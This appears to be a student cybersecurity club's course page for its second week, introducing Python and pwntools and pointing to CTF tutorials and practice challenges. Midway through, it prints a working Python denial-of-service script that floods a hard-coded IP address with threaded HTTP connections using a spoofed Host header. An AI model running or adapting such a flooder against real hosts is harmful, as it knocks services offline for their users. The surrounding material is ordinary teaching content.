Welcome to the second week (actually 1.5 weeks) of YoS :)
This week we will be covering Python along with one of its very powerful library pwntools.
Why it is called Python :)?
Python is an interpreted general-purpose programming language. It is one of the most popular and widely-used programming languages in the world due to its high usability and large collection of libraries. Again Python is an open source software like Linux. So you can look up its source code here, though you are not encouraged to read them 🦖.
Is Python itself written in C or C++? An interesting read on this. Unlike C or C++, Python has automatic memory management i.e. in Python memory allocation and deallocation method is automatic, since it has its own garbage collector, so that the user does not have to do manual garbage collection. Python is a dynamically typed programming language which makes it more succint.
We prefer Python in Cybersecurity, because complex scripts or attacks can be easily written in it. It helps to automate tasks across the cyberattack life cycle for both cyber attackers and defenders. Also, debugging python codes is quite simple.
import socket
import threading
target = '103.21.127.134'
fake_ip = '182.21.20.32'
port = 80
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()Snippet of a simple DoS attack script in python.
We are not taking up how to install python. Since it is available by default on Linux. Also, just a google search away :).
Here is the link to install pwntools. Though it comes pre installed on the VM we have provided.
This week's content includes an introduction to Python(syntax and such stuff). These resources will make you comfortable with python.
Followed by an introduction to pwntools, an interesting framework. Pwntools in itself is a huge package and even a dedicated module would be less to know everything about it. It will get you familiar with writing exploit scripts in Python.
Some other important modules/libraries regularly used are sys, os, subprocess, all these are in-built python modules.
CSeC - Intro to Python | Colab Notebook link
Credits to scimaths 🙏
- Pico Primer(python + other basics)
- Intro to Python (You may skip classes)
- Pwntools Cheat Sheet
- Another brief learn python playlist (The first 8 videos (85 mins) of the playlist are enough to get you going, you may skip the remaining videos :)
- string evaluation of input in python2 HSCTF - Python Remote Code Execution (5 min) | Read more about Python2.x input vulnerability
- pwntools process interaction GOOGLE CTF 2021 (good read)
- pwntools in bash TAMU CTF 2020 (17 mins)
- Request module usage OverTheWire natas level4 (11 mins)
- Pyjail Offshift 2021 (6 mins)
Now you may move to Challenges section to complete this week's material. Optimal duration to complete all the above material is 1.5 weeks(11 days).
- PicoGym (Filter challenges by General Skills)
We have designed 5 challenges (in increasing order of difficulty):
All challenges are present in different folders of this
repository. All in all, you would need to solve atleast 2 challenges throughtout the module but we encourage that you solve all of these, for things are more fun that way 😊.
Make sure you go through the respective README.md files before jumping into the challenge. Have fun! 😁
Discussions among mentees are encouraged and we request you to use our Discord Server for the same.
Created with ❤️ by CSeC